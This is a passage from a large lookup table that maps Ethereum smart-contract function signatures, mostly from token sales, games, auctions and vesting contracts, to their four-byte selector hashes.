"0xeb7085cb", "manualOverride()": "0xbae6d62b", "End6()": "0x5a8654ad", "lastWeiPricePerCWC()": "0x6cc762d8", "oneHourAfterStartTime()": "0xeee1c59d", "STATE_BET_DISABLED()": "0xd3ddebce", "remainderAmount()": "0x031f3b1a", "currentAgreement()": "0xc90f793e", "maxBuyingDate()": "0xf097e106", "orderLastDate()": "0x57d9fd41", "etherReceivedCrowd()": "0x2960109d", "totalETM()": "0x2334623f", "TzTToken()": "0x3bba72c3", "foreignBridge()": "0x7445d659", "minimunEthereumToInvest()": "0x666fc4d4", "openPreICOPrivate()": "0xe6e08ba4", "_platformSupply()": "0x32e62358", "publicStartTime()": "0x5fd1bbc4", "postSoftRate()": "0xdf571e33", "governingLaw()": "0xe46871f1", "priceLC()": "0x247c6c70", "tokenIssueDeadline()": "0x33e9698c", "GenesisTransfersCount()": "0xe2c9bc9e", "firstroundprice()": "0x012397ff", "thirdCurrentAmount()": "0xa0af3252", "CONTRIBUTION_MAX()": "0x1a2309f0", "ERC20ByteCode()": "0xebb1dc21", "havedDistDevCoin()": "0x8d0d018c", "currentParticipants()": "0x9b3662bf", "distribute_token()": "0xc64bf32f", "COLOR_GREY()": "0x373f5ff0", "percentageBuyBackFund()": "0x6ca32280", "continueIco()": "0xa6fc2823", "onefive()": "0x5731d9e3", "daoStakeClaimed()": "0x426e0b20", "lastBlock_a17Hash_uint256()": "0xe6c63912", "AmountRaised()": "0x6c526503", "m_ETHPriceLowerBound()": "0x2fae43dc", "reclaimPeriod()": "0x46e9e3c2", "jackPotPercents()": "0x1fd2676f", "fourthBonusEnds()": "0x3bfb3c35", "BONUS_TIER1()": "0x59cc721c", "NAME_NOT_AVAILABLE()": "0x62e23e9e", "balancesStaticoin()": "0x7f9ac04f", "rateUSD()": "0xf853ee49", "weiToPresalersFromICO()": "0x71c10778", "mainSaleFirstStartDate()": "0x55ddc9f0", "lastCheckBlockNo()": "0x172727c0", "firstRoundICOStart()": "0x17cc67b9", "ticketMag()": "0x128ef181", "winnerid()": "0xc6960d4c", "exchangeFormula()": "0x2f7a407b", "requestEvidence()": "0xa1c91040", "CORE_TEAM_PORTION()": "0x745ced49", "thirdChainETH()": "0xe5f6f716", "maxPreCrowdAllocationPerInvestor()": "0x28f9a563", "foundersPercent()": "0x65e1cc85", "reserveETH()": "0x100af203", "tokenGenerationMax()": "0xb57e6ea1", "CrowdsalePaused()": "0xb33cb8f6", "slaveServer()": "0x96fcd214", "MINIMAL_PARTICIPATION()": "0x209f3c9c", "totalAngelCardSeries()": "0xb38260fe", "BIG_NUMBER()": "0x2f4fda30", "totalExternalSales()": "0x784fdf26", "tokenCreationCapWithOutBonus()": "0xf3a16c3e", "teamWallet_1()": "0x643b18b6", "destErc20()": "0x7becd54a", "divForEthertoteDevelopmentWallet()": "0x0ddf78c2", "lrcWithdrawn()": "0xc59acae4", "tier_cap_3()": "0x08ff597a", "discounts()": "0x75af65d1", "crowdPrice()": "0x1a0b1b86", "ito()": "0xe06902fa", "max_value()": "0x98597629", "airdropSpent()": "0x28bc8a04", "maxGasPriceInWei()": "0xaf7ed9d7", "TRANCHE2_ACCOUNT()": "0x7f592be4", "getSupportedTokens()": "0xd3c7c2c7", "ResearchAndDevelopment()": "0x2da758b0", "ethersContributed()": "0xffd571ca", "allGuGiven_()": "0x8673094f", "TOKENS_FOUNDATION()": "0x8f5d23f6", "isContractPaused()": "0xf4ab2928", "maxFinneyPerSaleLessThan()": "0xe1587aae", "referralTokensAddress()": "0x8f4d874a", "etherRatioForOwner()": "0xd3400a1d", "passOff()": "0xae154aab", "walletWithdraw()": "0x96450a6d", "getPrizePot()": "0x5f74c16c", "reclamaPagamento()": "0x968790d0", "intermediadorAprovaPagamento(bool)": "0xbe063693", "intermediadorAprovaDevolucao(bool)": "0x0a38b400", "aprovaDevolucao(bool)": "0x1c22ac19", "solicitaDevolucao()": "0xf9ff1378", "solicitaPagamento()": "0xb6932ce7", "depositaPagamento()": "0x3bffd31e", "inicializaStatusPossiveis()": "0x25a190c9", "viewBalance(address,address)": "0x0e014cf8", "splTransferFrom(address,address,uint256,uint256,uint256)": "0xd8de5a41", "metherToken()": "0x5ca5b054", "specialTransfer(address,uint256,uint256,uint256)": "0xc7da93b7", "hasEnoughTokensToPurchase(address,uint8)": "0x49e77c8b", "TCT(uint256,string,uint8,string)": "0x4e4f776c", "AdamToken()": "0xdc3f7536", "setMain(address,address)": "0x076a6440", "_matchedTags(bytes32[],bytes32[])": "0x2cc0a28c", "addBrick(uint256,string,string,uint32,string,bytes32[],uint256)": "0x668d5f48", "amIH1()": "0x3d18e7b5", "getH3Amount()": "0xbf59cdff", "getH2Amount()": "0xaeb1355f", "getH1Amount()": "0x973516f2", "getH3Bidder()": "0x1ceba89b", "getH2Bidder()": "0xcf0dbc27", "getH1Bidder()": "0xb84172e7", "getHighestBidder()": "0x003495a4", "getDeployedAuctions()": "0xd1eba9c9", "createAuction()": "0xf5811447", "eastadscreditsx()": "0x537afe94", "AdHiveToken(address,string,string,uint256,uint256)": "0x54105974", "GenChip(uint32)": "0xe5553b33", "CheckGenChip(uint32)": "0xdb9078b4", "GenChipByRandomWeight(uint256,uint8,uint256[])": "0xce44573a", "GetDynamicCardAmountList(address)": "0xb59b6acb", "GainCard(address,uint32)": "0xae382baa", "GetCardList(address)": "0x803c64c3", "HasCard(address,uint32)": "0x3a7a52d2", "GainCard2(address,uint32)": "0x5c2bdc9f", "GetChipList(address)": "0x8fd88225", "GetChipNum(address,uint32)": "0x66ff8201", "CostChip(address,uint32)": "0xbb2ebf83", "GainChip(address,uint32,bool)": "0x2e799a77", "GetTempStuffList(address)": "0x74e9e102", "GetTempStuffExpire(address,uint32)": "0x4ce197f3", "GainTempStuff(address,uint32,uint256)": "0x64d57a03", "GetStuffList(address)": "0xdf67ae3d", "GetStuffNum(address,uint32)": "0xaed6d8d4", "CostStuff(address,uint32,uint256)": "0x848dd14e", "GainStuff(address,uint32,uint256)": "0x26b7fe35", "MasterWithdraw()": "0x85564b97", "AddBonus(uint256)": "0x6bdea7eb", "QueryMyBonus(address)": "0x54370a8d", "QueryBonus()": "0x1bb409c4", "ProfitByCard(address,uint32)": "0x5bcafcf3", "ImmediateProfit(address,uint256)": "0xa5e52c08", "AddStaticProfit(address,uint16,uint256)": "0x2a548276", "AddDynamicProfit(address,uint32,uint256)": "0x2b318568", "GetDynamicCardAmount(uint32,uint256)": "0x3e7e250e", "QueryPlayerBonus(address,uint256)": "0x8c9ae56f", "RefreshDayBonus()": "0x395deefa", "GenPlayerRatio(address,uint256)": "0xc7cb94e3", "GetPlayerDynamicRatio(address,uint256)": "0x32369e38", "GetDynamicCardNum(uint32,uint256)": "0x6f9ff0fa", "GenDayRatio(uint256)": "0x40e4ebf4", "GetDynamicRatio(uint256)": "0xb714e3cc", "PlayerNeedRefresh(address,uint256)": "0x0a78e560", "NeedRefresh(uint256)": "0x68690dd0", "GetExistsChipList()": "0xb5b64d24", "GetChipInfo(uint32)": "0x6c2412ae", "GenChipByWeight(uint256,uint8,uint256[])": "0xc890f27e", "RefreshChipUnableList(uint8)": "0xeba052e7", "AddChipTempTime(uint32,uint256)": "0x2e46cb09", "BeforeChipCost(uint32)": "0x4fa406ee", "BeforeChipObtain(uint32)": "0x1e4a126e", "ObtainChip(uint32)": "0xbd5b758d", "CostChip(uint32)": "0x0116bc53", "CanObtainChip(uint32)": "0x1d659153", "GetChipUsedNum(uint32)": "0xb5ef649d", "ChipExists(uint32)": "0x4bd1c253", "GetPartManager(uint8,uint256)": "0x37142391", "GetChip(uint32)": "0xb805a5ca", "AddNewChip(uint32,uint8,uint8,uint8)": "0xdc2816b7", "GetExistsCardList()": "0x227d111e", "GetCardInfo(uint32)": "0x31b62fae", "GetCard(uint32)": "0xd7074aaf", "CardExists(uint32)": "0x2a4d1a12", "AddNewCard(uint32,uint32,uint8,uint16,uint16,uint16,uint16,uint32[])": "0x60a4d1a5", "getBB0()": "0x3b8ff7be", "getDougAge(uint256)": "0xa633d8d4", "getDougName(string)": "0x37721ab7", "registerA(string,string,string,address)": "0x73b4484f", "BitcoinIndigo()": "0xe6642528", "LightLemonUnicorn()": "0x398d07f0", "_getHardCap()": "0x54c72ead", "withdrawPROV(uint256)": "0xb39a69a3", "saveInfo(string)": "0x41adb3f5", "Predatex()": "0x0ed7a0f2", "MyTALToken()": "0xbb83a01f", "_setUserInfo(address,uint256,uint256,address)": "0x8dbe6c33", "pecunioToken()": "0x5d1be58e", "product2()": "0x2a10ff23", "bbdToken()": "0x43bcf52a", "stage1Deadline()": "0xce18eb0b", "OVISBOOKED_BONUSTOKENS()": "0x4f9bfdac", "tokenPresaleSold()": "0x108b77ad", "whitePaperHash()": "0x77ef2c91", "weiPerMinToken()": "0x0659928c", "initialEnemyCombination()": "0xda8300d2", "tokenFrozen()": "0xafc361bc", "FEED1()": "0xbc04cb0f", "normalBuyLimit()": "0x15c8d628", "claimSMR()": "0x9c09a64c", "icoPaused()": "0x3b278f2a", "ORACLIZE_COMMISSION()": "0x6525a233", "STARTDATE()": "0x7e4d5ea1", "preparationPeriodEquipmentTrainingFeeMultiplier()": "0xb6fc276a", "minTokensToBuy()": "0x3b574beb", "totalTrainer()": "0x7216ee00", "priceT4()": "0xaba61514", "monthlyWithdrawLimitInWei()": "0x03216695", "segmentSize()": "0x3cec9309", "ROLE_CEO()": "0x7708ea1d", "iMMCoinbuyPrice()": "0x5d04af9c", "limit()": "0xa4d66daf", "recentPlayersFront()": "0xb87aedcc", "baseprice()": "0x480a434d", "operationsPercent()": "0xf00f087f", "compatible223()": "0x0f86f702", "tokenBonusForThird()": "0x506a6a10", "withdrawDragonsFilm()": "0xcc8cd5c5", "README()": "0x00ad861f", "VOTING_DURATION()": "0xa438d208", "vestingFounderAddress()": "0xf7df8f87", "ZombiewCreator()": "0x0d85ef17", "tierLevel()": "0x6448adc6", "pregnantNinjas()": "0x0f62562f", "getOraclizeGas()": "0xea3d7e2c", "callgDistributed()": "0x67426ba4", "weiGoal()": "0xec7dfb4d", "Withdraw_4()": "0x67e6869d", "openSaleStartTime()": "0x053e3169", "adminer()": "0x57dc5d9d", "whiteListAddress()": "0x54d06009", "BOUNTY_TOKENS()": "0x63f0ca5a", "auctusWhiteListAddress()": "0xb0e849fe", "POSAddress()": "0x91378400", "amountOfBRAsold()": "0x0ae75eb8", "unlockPeriod()": "0x20d3a0b4", "gvToken()": "0xbdceed0b", "DML_TOTAL_SUPPLY()": "0xfe892327", "startDividendsPeriod()": "0x082e2814", "THIRD_SUPPLY()": "0xfd89d17f", "supplyRound3()": "0x6221c805", "transfersLocked()": "0x83f1211b", "isLeftTokenIssued()": "0x95e66ea1", "ethToken()": "0x7bf1a627", "veredictum()": "0x2267b2e3", "minNum()": "0x864fda69", "getLevel()": "0xa5985e8c", "preICOcontributors()": "0xf14ca885", "PRICE_RATE_FIRST()": "0xbdf75a6a", "maxCompanyValue()": "0xcb79d573", "TIMEOUTBLOCKS()": "0xe1757a3c", "purchasedCoins()": "0x0b59a5c4", "xpaFundDeposit()": "0xe1c33523", "ownerGrace()": "0x85fe551a", "ARTWORK_AUCTION_DURATION()": "0xe58eda1b", "tokenIssuedToday()": "0x3c9ad41b", "tier3()": "0x4b1740ad", "gamePaused()": "0xc3de1ab9", "checkMinContribution()": "0x79fed7cb", "awayTeam()": "0x7d79c192", "inquireDividentAmount()": "0xb2057a6f", "minimumEtherCommission()": "0xaf2885b2", "lastBlock_v4()": "0x9f6163ee", "t4tRaised()": "0x4d53c30f", "createSnapshot()": "0x1504d8f0", "defaultPercent()": "0x7bd63411", "MINI_GAME_PRIZE_CRYSTAL()": "0xdecd8a25", "IOU()": "0x046c472f", "FUNDING_END_TIMESTAMP()": "0x8d7eca6f", "prefilled()": "0xe77a912f", "packSaleAddress()": "0xc4a31557", "kittenContract()": "0xff757d59", "claimFromPool()": "0x8d44f13b", "advisorTotal()": "0xce4cf4c8", "netAmountBought()": "0x9e890cb3", "EGGS_TO_HATCH_1HIPSTER()": "0x853a9d32", "servusTokensAllocated()": "0x0c237dde", "presaleTokenCreationCap()": "0x55f13278", "endTime1()": "0xe329e871", "AAC()": "0xc18b4136", "genesisProtocol()": "0x7581d62f", "totalEthCharityCollected()": "0xcbe0a1aa", "PRE_ICO_END_TIME()": "0xd8e963b3", "bountyTotal()": "0x40896550", "Luckybuy()": "0x45293f0e", "borrowerReturnDate()": "0xbda6c497", "upLimit()": "0x6a748ecf", "getRoundDividendShare()": "0xf7ed6031", "createSqr(uint256,address,uint256,uint256)": "0xe2449c13", "buySqr(uint256)": "0x283506fb", "EthsqrCore()": "0xec30ad95", "getPaymentsHeld(address)": "0x5adada87", "EthsqrGate()": "0xd7c35657", "EternalChainToken()": "0x1f8ea5e8", "addMultipleRecords(uint256[])": "0x114de05e", "addRecord(uint256)": "0x37e15240", "OctaBlock()": "0xf1f4e25d", "saveNewAnchor(bytes32)": "0x7634ed39", "GemstoneToken()": "0x30183a2c", "Dragon()": "0x8ad47c47", "BTCP()": "0x3d68d33f", "purchaseTokens(uint256)": "0x7b97008d", "updateMaintenanceAddress(address)": "0x275893a9", "updateRelay(address)": "0x29ca9dca", "relay(address,uint256)": "0xeeec0e24", "Dollar()": "0x44fbc1ef", "FaceTech()": "0x67b0e070", "batchTransfer(address,address[],uint256)": "0x5215ad0b", "RootCoin()": "0x3f3edfa4", "AdvancedArtificialIntelligenceSafetyDefense()": "0xdad22781", "WashingtonExchange()": "0xb3eae9ac", "getDemurrageableBalance()": "0x5c919aa3", "addExemptedAccount(address)": "0x29781ec8", "DgxDemurrageReporter(address,address,address,address)": "0x939cda3f", "updateDemurrageReporter()": "0x45278394", "showCollectorsAddresses()": "0x7e43185a", "refundContributors()": "0x56c7f461", "sendFromContract(address,address,uint256)": "0xfe442478", "burnFromAddress(uint256)": "0xe06c5808", "sendWithFreeze(address,address,uint256,uint256)": "0xccf2b87b", "reserveForTeam(address,address,uint256,uint256)": "0x5b79dbe5", "getLockedContract(address,address)": "0x56c46ac2", "reserveFunds(address,address)": "0x89d9ed38", "setBurnAddress(address,address)": "0xe90cb9b9", "UnKoin()": "0xfa68829a", "MyUserToken(uint256,string,string)": "0x9f548613", "EtherbotsCore()": "0xbaa9a8a9", "_addPartExperience(uint256,int32)": "0x9e58e1a7", "_scaleExp(uint32,int32)": "0x8ba1c353", "_addUserExperience(address,int32)": "0x0b395d1e", "_generateBattleReward(uint256,int32)": "0xb1ac478f", "_calculateShards(int256,uint256)": "0x1826fb35", "_getExpMultiple(int256)": "0xa31cd710", "_getExpProportion(int256)": "0xecab1a06", "_storeReward(address,int32)": "0xa472c868", "_isApprovedBattle()": "0xb70f0058", "loserOf(uint256,uint256)": "0xe3ffcb84", "winnerOf(uint256,uint256)": "0xaf598bc7", "cancelBattle(uint256)": "0x4c4c447e", "createBattle(address,uint256[],bytes32,uint256)": "0x7ab14aae", "playerCount()": "0x302bcc57", "_migrateExpiredCrates()": "0x2fbd2134", "_convertBlueprint(string)": "0xb31a4047", "_getPartId(string,uint8,uint8,uint8)": "0x19d3be48", "_getElement(string,uint256)": "0xe937f689", "_getRarity(string,uint8,uint8)": "0xa9f73dd2", "_migrateRobot(string)": "0xd4ab4a89", "_calculatePayment(uint8)": "0xb7c74cf6", "purchaseCrates(uint8)": "0x8fdc054f", "incrementPrice()": "0xb5bf6eb6", "getExpiredCratesForUser(address)": "0xf75b8d3c", "getPendingCrateForUserByIndex(address,uint256)": "0x2f55745b", "getPendingCratesForUser(address)": "0xf6b4c691", "getRobotsForUser(address)": "0x7b2bff9d", "getRobotForUserByIndex(address,uint256)": "0xc7d4f68e", "getRobotCountForUser(address)": "0x03339af5", "openAll()": "0xbbd31db3", "NewCratePreSale()": "0x06bb18c0", "_migrate(uint256)": "0xd166539b", "setScrapyard(address)": "0x50c5c99a", "_getElement(uint8[],uint8)": "0x02beee07", "_getRarity(uint256)": "0x1aad5bc2", "_getRandomPartSubtype(uint256,uint8[])": "0x5fa8c869", "_generateRandomPart(uint256,address)": "0xedc62aaf", "_randomIndex(uint256,uint8,uint8,uint8)": "0x5d2a9b6a", "_createPart(uint8[4],address)": "0xb6dadbdf", "_getNextAuctionPrice()": "0x995b40f3", "_createScrapPartAuction(uint256)": "0x44b7a3b7", "setAuctionAddress(address,address)": "0xa9dda4df", "_prestige()": "0xabba87c1", "_addPerk(uint8)": "0x9eea67e8", "_sumActivePerks(uint8[32])": "0xa3bfe069", "_isValidPerkToAdd(uint8[32],uint8)": "0x0717f39e", "_parent(uint8)": "0x76271346", "_rightChild(uint8)": "0x30ce8bd5", "_leftChild(uint8)": "0x5541b817", "UnFreezeProduct(uint256)": "0x4a5791e0", "FreezeProduct(uint256)": "0xb3d84a28", "WithdrawFees()": "0xc0bb8466", "Pay(uint256)": "0x781a2cca", "AddProduct(uint256)": "0x2c0d0dbe", "EtherMango()": "0x7eae75a8", "addCourses(string,address[])": "0xec875f98", "addCourse(string,address)": "0x9c89ddb5", "getCourseList(string)": "0x594aa668", "CourseCertification()": "0xb823e991", "SimpleEthBank()": "0x07129e67", "chipSpeed()": "0x1abb10e8", "PRE_SALE_CAP()": "0xc7a1fb36", "addressBankPartners()": "0x9a63157a", "rcnFundDeposit()": "0x5e6992e3", "sn()": "0xf872bec0", "getLastDataHash()": "0x1302188c", "discountICO()": "0x23437d50", "tgeSettingsAmount()": "0x2f1c6494", "voteName()": "0x86f5114e", "ADDR_TKG_TECH_FUND()": "0xf390cae4", "collected()": "0x84bcefd4", "historyId()": "0xcd2d8a2d", "tank()": "0xb7f01bfc", "bingo()": "0xa7724b16", "countTotalInvestorsInCrowdsale()": "0xfd2db3f4", "MAX_USD_FUND()": "0x79099e15", "pre_tokensSold()": "0x8551b896", "finalyzeContract()": "0x29bc5d0f", "managerAmount()": "0x3c096005", "saleExchangeRate5()": "0x1caa0c6d", "onehour()": "0x483d8b77", "privateDiscountPrice()": "0x07fffa9d", "TimeStart()": "0x3962c4ff", "addrBRXPay()": "0x23d17a40", "initializedTime()": "0xf81f8101", "nextPriceDate()": "0x1973cae7", "bossCutPercentage()": "0x368f76a9", "arrayLength()": "0xe554482e", "newMostInviter_()": "0x81d77862", "previousSender()": "0xdb1b569f", "postHardRate()": "0xf4835aea", "determineOutcome()": "0xa068edb5", "primaryGasLimit()": "0x95d4f7dd", "COLOR_PINK()": "0x44ba16a2", "HardwareWallet()": "0xd7d40523", "getTokenUserCounter()": "0xbe8dd49a", "Hotlist()": "0x1ded587c", "unfreezeAdministrationContract()": "0x4a4a2b52", "totalUnrestrictedTokens()": "0x9dcbed8b", "END_PRESALE_TIMESTAMP()": "0x9b15ef2e", "globalTimeVault()": "0x6aede5cd", "minBuyLimit()": "0xb81df742", "amountReservedTokens()": "0xbd8d5ce3", "CROWDSALE_LIMIT()": "0xc2656473", "CEOAddress()": "0x5fcee7a0", "premiumValue()": "0x49044cc5", "TOKEN()": "0x82bfefc8", "withdraws()": "0xd9510215", "teamLocker()": "0x80bc99cb", "fundraiserAddress()": "0x65687008", "addressToken()": "0x7ba4a58a", "coiner()": "0xd4b9e410", "admin_profit()": "0x12b392ee", "MAX_BALANCE()": "0xdef92c69", "fstPrice()": "0x758357b8", "STATE_CLAIM_ENABLED()": "0x82a3e5df", "VYRAL_REWARDS()": "0x76ff87cc", "totalETH()": "0x36bdee74", "numerator()": "0xce5f9454", "Leverage()": "0x43e0dfdd", "periodITO_weiPerToken()": "0xd4e8b749", "COMMUNITY_PERCENT()": "0xa804fcb4", "sellStores()": "0x96adad2e", "NextRewardBonus()": "0x43562bd0", "adminsDisabledForever()": "0x54924aec", "allocated4Year()": "0x36eec28e", "whiteListRegistrationEndTime()": "0x72ef149e", "addguess()": "0x8f701eaa", "miningKing()": "0x40510399", "BRONZE_AMOUNT_NDC()": "0xca3c8e11", "affiliateFee()": "0xba818f8d", "_locked()": "0x223fcbc9", "firstPeriodWindows()": "0xe2322c73", "fundTeam()": "0x48a3cbdf", "startPrice()": "0xf1a9af89", "saleEtherReceived()": "0x25534a1e", "stabilityBoardProxy()": "0x3ed0619b", "icoStoppedManually()": "0xa0579801", "actual_feedout()": "0x51a6b851", "numOfLoadedEarlyPurchases()": "0x46e4d35d", "transfer_close()": "0xb6abd4e7", "m_opNum()": "0xdf98ba00", "buyerDecimals()": "0xfb0a2e3c", "defaultText()": "0xde4b3a73", "teamOneId()": "0x63299226", "COIN_COST_ICO_TIER_1()": "0xa3414653", "allOpenTradesAmounts()": "0x4ab40ac6", "minimum_payment()": "0xf238dbea", "frozen()": "0x054f7d9c", "team2LockEndTime()": "0x86c455ee", "fundingMaxCapUSD()": "0x5aaac1d1", "JOCKEY_LIMIT()": "0x7fe0c38b", "endRegisterTime()": "0x6aaf0a0d", "exporter()": "0x4bbbe0cc", "GAMESPLAYED()": "0xfab2e425", "preCrowdsaleTokens()": "0xc1ea8b93", "divCutPool()": "0x0c83700a", "sweepsCreationTime()": "0x4086b620", "logoY()": "0x90e517e7", "show_number_of_days_since_bank_opening()": "0xb35176e2", "forgeWeaponPureDamage(uint256,uint256,uint256,uint256)": "0xd2164302", "weaponTokenIdToDamageForEncounter(uint256,uint256)": "0x57cea5c0", "constructWeaponTokenId(uint256,uint256,uint256)": "0x230a3c05", "getMonsterDefenseFromDna(uint256,uint256)": "0xa9550ecb", "getPureWeaponDamageFromTokenId(uint256)": "0x40f12a02", "getWeaponDamageFromTokenId(uint256,uint256)": "0x6b5cd8d0", "getWeaponRarityFromTokenId(uint256)": "0x25756d90", "constructWeaponTokenIdForWinner(uint256,uint256)": "0xea794ef4", "getLootClaimed(uint256,address)": "0xd4f397b5", "getEncounterResults(uint256,address)": "0x61df5c4d", "getBlockToHashForResults(uint256)": "0x1b9fec58", "getParticipants(uint256)": "0xc1e3bd3e", "getEncounterDetails()": "0xd7b2f360", "blockBeforeEncounter(uint256)": "0xaacfd352", "claimDailyLoot(uint256)": "0x27121b76", "leaderboardEntries(uint256)": "0xe3e7d4f4", "getFirstEncounterIdFromDay(uint256)": "0xbf43fffb", "setParticipateDailyLootContribution(uint256)": "0x56575bd7", "setParticipateFee(uint256)": "0x8534b3a8", "setGasRefundForClaimLootWithConsolationPrize(uint256)": "0x058fa067", "setGasRefundForClaimConsolationPrizeLoot(uint256)": "0x0597f3aa", "setGasRefundForClaimLoot(uint256)": "0xa17eee56", "smax256(int256,int256)": "0xdafea207", "finalizeApprovedContracts()": "0x3a674500", "removeApprovedContractAddress(address)": "0xd43f24b0", "addApprovedContractAddress(address)": "0x47a5b1b3", "OneToken()": "0x1db046ad", "nicole()": "0xd7303eaf", "CrestToken()": "0x9ed798be", "EasticoinToken(uint256,string,string)": "0xc514ff3f", "Easticoin(uint256,string,string)": "0x48cb5aeb", "set_sell(bool)": "0x7c524b2e", "withdrawal_Eth(uint256)": "0xd73b3a67", "withdrawal_Lem(uint256)": "0x7c6ac2af", "UnitToken(uint256,string,string)": "0x52810d5e", "Admined()": "0x98cbb277", "EthereumRisen()": "0x88fad42a", "startAirdrop()": "0xd2a569c3", "countYears()": "0x6f9607e5", "countMonths()": "0x10e7a9ce", "countWeeks()": "0xea2f28d3", "countDays()": "0xe6cda5ff", "isFullInvest(address,bytes5)": "0x4033c268", "closeAnnualInvest()": "0xed5e68f9", "closeMonthlyInvest()": "0x7d4f1883", "closeWeeklyInvest()": "0xa718e774", "closeDailyInvest()": "0xb2963db6", "closeInvest(bytes5)": "0x80087745", "makeAnnualInvest(uint256)": "0xc794f575", "makeMonthlyInvest(uint256)": "0x1a751b2c", "makeWeeklyInvest(uint256)": "0x19d46f71", "makeDailyInvest(uint256)": "0x6b1f513b", "makeInvest(uint256,bytes5)": "0x7ea868e1", "bonusSystem(bytes5,uint256)": "0xdb6c1831", "compaundIntrest(uint256,bytes5,uint256,uint256)": "0x5898f402", "rewardController(address,bytes5)": "0x87ddc521", "loopFor(uint256,uint256,uint256)": "0x3c2f24af", "countPeriod(address,bytes5)": "0x63121665", "setMinMaxInvestValue(uint256,uint256)": "0x7fa44926", "stringToBytes5(string)": "0x2c6ed612", "rateSystem(address,uint256)": "0xd191e11d", "watchPrice()": "0x4e0128fb", "stopMint()": "0xd5582965", "delManager(address)": "0xa65eacdc", "superManager(address)": "0xbc03a31e", "powsm(uint256,uint256)": "0x189af42f", "addsm(uint256,uint256)": "0x404983fb", "subsm(uint256,uint256)": "0xb8af146f", "divsm(uint256,uint256)": "0x0b9f6108", "mulsm(uint256,uint256)": "0xbbbfc4db", "AXXToken()": "0x934a0b57", "Bee()": "0xb7098a32", "burnOWL(address,uint256)": "0x4417f4db", "mintOWL(address,uint256)": "0xf52a41f3", "getMasterCopy()": "0x04e80e90", "updateMasterCopy()": "0x2cef4dac", "startMasterCopyCountdown(address)": "0xf625ee28", "MILL()": "0x9333d6c0", "isTrustedBy(uint256,address)": "0x1679657a", "attest(uint256)": "0x4af6ffc2", "newFact(string,string)": "0xc90cfb0b", "bumpPointer()": "0xdadcb460", "ProjectCoin()": "0xf84b624e", "exchangeTokens(address,uint256)": "0x4256fa9f", "removeExchanger(address)": "0x506bd3a6", "addExchanger(address)": "0xf89f2a65", "claimMedals(uint16)": "0x0bca5903", "DataContacts(address,address,address)": "0x87a675ca", "resumeCollectToken()": "0xcf7b38a2", "pauseCollectToken()": "0x748b659d", "setWithdrawer(address)": "0x0d174c24", "yearFor(uint256)": "0x6f8c9575", "KeyRewardPool(uint256,address,address)": "0x4ae4dd6b", "migrateContributors(address[])": "0x497dd0cb", "BancorHandler(address)": "0x6153b827", "CWCCToken()": "0xfb3b11af", "CWCCTokenIssue(address)": "0x2d7e92a5", "iDeal()": "0x561b1d72", "getVoterCount(uint256)": "0xe92e5c34", "getVoter(uint256,uint256)": "0x6f94e502", "remainingTokenAmount()": "0x3539c468", "airdropManually(address,uint256)": "0x60bc5a06", "AirdropController()": "0x7fb1a5ed", "masFreezedTokens(address[],uint256[],uint256[])": "0x24db1f50", "onlyAdmin()": "0xa5f7823e", "distructVault(bool)": "0x2e33cd7a", "prolongate(uint256)": "0xb25c372e", "fastTokenSale(uint256)": "0xb324c62a", "calcAndGet()": "0x2d126239", "calcFin()": "0x53f4b36f", "getBeneficiaryCash()": "0xc4c308be", "getPartnerCash(uint8,bool)": "0x57246c1c", "changeCrowdsale(address)": "0xad2b14d1", "changeExchange(uint256)": "0x831e1deb", "internalCalc(uint256)": "0xb08428c1", "BuzFinancialStrategy()": "0x3ba7ecc0", "createFinancialStrategy()": "0x960ba088", "getPartnerCash(uint8,bool,address,bool,uint256)": "0x3914010a", "getBeneficiaryCash(address)": "0x9453f381", "setup(address,uint256,uint256,uint8)": "0x7e3d8813", "setPrices(uint256,uint256,uint256)": "0xa88fe42d", "JiucaiToken(uint256,uint8,string,string)": "0x9dc8832c", "TokenERC20(uint256,uint8,string,string)": "0x09453628", "Impressio()": "0x3a9eea12", "ShutterToken()": "0x6588875e", "VASTToken(uint256,string,string)": "0x13390cf2", "getAddressClaims(address,address,uint8)": "0x85eb6109", "getAccessoryClaims(uint64)": "0xc7d26e90", "getPetClaims(uint64)": "0x3dbb874e", "getAngelClaims(uint64)": "0xc59d6abe", "claimZeronium(uint64,uint64,uint64,uint64,uint64,uint64)": "0x63a2fdbf", "awardTitanium(address,address,address)": "0xd2d9d44e", "claimDiamond(uint64,uint64)": "0xd65c8c6c", "awardBronze(address,address,address)": "0x9663a496", "getPetCardSeries(uint64)": "0x0942adbd", "checkExistsOwnedPet(uint64)": "0xc938acc8", "checkExistsOwnedAngel(uint64)": "0x75a3eac0", "DataContacts(address,address,address,address,address)": "0xb6893f7d", "getAccessoryLockStatus(uint64)": "0x1e442919", "getTotalAccessories()": "0x976d16d5", "getTotalAccessorySeries()": "0xbf6c277a", "getAccessoryByIndex(address,uint256)": "0xf44191f0", "getOwnerAccessoryCount(address)": "0x5b1d0d1e", "getAccessory(uint256)": "0x01637ff4", "getAccessorySeries(uint8)": "0xedddb350", "updateAccessoryLock(uint64,bool)": "0xc64f9490", "ownerAccessoryTransfer(address,uint64)": "0xeee59ccf", "transferAccessory(address,address,uint64)": "0x277e1de7", "addAccessoryIdMapping(address,uint64)": "0x00e4778a", "setAccessory(uint8,address)": "0xf0485328", "createAccessorySeries(uint8,uint32,uint256)": "0x5d40c0ae", "getAngelLockStatus(uint64)": "0xa6c1d611", "getTotalAngels()": "0xfdf8e11c", "getTotalAngelCardSeries()": "0xdb3d8421", "getAngelByIndex(address,uint256)": "0x047408aa", "getOwnerAngelCount(address)": "0xbd639259", "getAngel(uint64)": "0x9d069353", "getAngelCardSeries(uint8)": "0x920dce19", "removeCreator()": "0x7f26fc7d", "updateAngelLock(uint64,bool)": "0xb1c32b2b", "ownerAngelTransfer(address,uint64)": "0xe1baa2a0", "transferAngel(address,address,uint64)": "0x2e448f4b", "addAngelIdMapping(address,uint64)": "0x6dc88e1f", "setLastBattleResult(uint64,uint16)": "0x974fd2f3", "setAngelLastVsBattleTime(uint64)": "0x408760b8", "setAngelLastBattleTime(uint64)": "0xa4a4c224", "addToAngelExperienceLevel(uint64,uint256)": "0x8e5152d6", "setAngel(uint8,address,uint256,uint16)": "0x86237e7b", "updateAngelCardSeries(uint8,uint64,uint64)": "0x27380c2c", "createAngelCardSeries(uint8,uint256,uint64,uint8,uint16,uint64)": "0x43fce818", "ProofPresale()": "0xdae9c31b", "ProofPresaleToken()": "0x1712a72f", "referrerBonus(address)": "0x54a9de1c", "bytesToAddres(bytes)": "0x3fa4687b", "LuxArbitrageToken()": "0x6e8ddc7a", "addLockAddress(address,uint256)": "0x2f30cd5f", "addLockAddressInternal(address,uint256)": "0x697fb220", "ReleasableToken()": "0x07cb33d5", "doFinalize()": 